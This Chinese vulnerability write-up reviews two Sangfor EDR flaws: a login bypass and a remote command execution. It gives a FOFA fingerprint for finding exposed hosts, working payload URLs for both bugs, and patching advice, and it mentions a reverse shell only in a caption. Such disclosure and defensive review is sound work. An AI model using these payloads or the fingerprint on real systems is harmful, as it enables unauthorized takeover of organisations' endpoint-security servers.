【HW2020漏洞回顾】深信服EDR两大漏洞

深信服终端检测响应平台EDR,围绕终端资产安全生命周期,通过预防、防御、检测、响应赋予终端更为细致的隔离策略、更为精准的查杀能力、更为持续的检测能力、更为快速的处置能力。支持统一化的终端资产管理、终端病毒查杀、终端合规性检查和访问控制策略管理,支持对安全事件的一键隔离处置,以及对热点事件IOC的全网威胁定位。绝大多数的EDR管理平台部署于内网环境中,少数系统可以通过外网地址访问。

 

NO.1  后台任意用户登陆漏洞

详情】攻击者可以通过构造payload绕过登录判断,直接拿到系统管理员/用户权限。漏洞影响版本<=v3.2.19。

【漏洞复现】

1)fofa指纹:title="终端检测响应平台",如图一所示,而后点击进入登录界面(图二)

【HW2020漏洞回顾】深信服EDR两大漏洞_第1张图片

图一

【HW2020漏洞回顾】深信服EDR两大漏洞_第2张图片

图二

2)Payload:https://ip:xx/ui/login.php?user=任意用户名,如https://ip:xx/ui/login.php?user=admin,回车即可成功登录平台(图三)

图三

注:该用户名须存在

 

NO.2   远程命令执行漏洞CNVD-2020-46552

详情

攻击者可通过构造HTTP请求来利用此漏洞,成功利用此漏洞的攻击者可以在目标主机上执行任意命令。国家信息安全漏洞共享平台(CNVD)已于8月18日收录该漏洞。CNVD对该漏洞的综合评级为“高危,漏洞影响版本v3.2.16-19”。

【漏洞复现】

1)构造Payload,这里漏洞文件是c.php,漏洞参数是host

/tool/log/c.php?strip_slashes=system&host=id

2)root权限(图4)

【HW2020漏洞回顾】深信服EDR两大漏洞_第3张图片

图4

3)反弹shell(图5)

【HW2020漏洞回顾】深信服EDR两大漏洞_第4张图片

图5

修复建议】官方已发布更新版本和修复补丁,用户只需更新至3.2.21版本或升级补丁可修复该漏洞。

 

针对深信服EDR系统近期出现的大量漏洞,建议系统使用方运营者及时自查,发现存在漏洞后,按照漏洞处置建议及时进行加固处置。

以上内容由yufei投稿,信安客出品,信安客——打造网络安全高端人才。

你可能感兴趣的:(行业资讯,安全漏洞)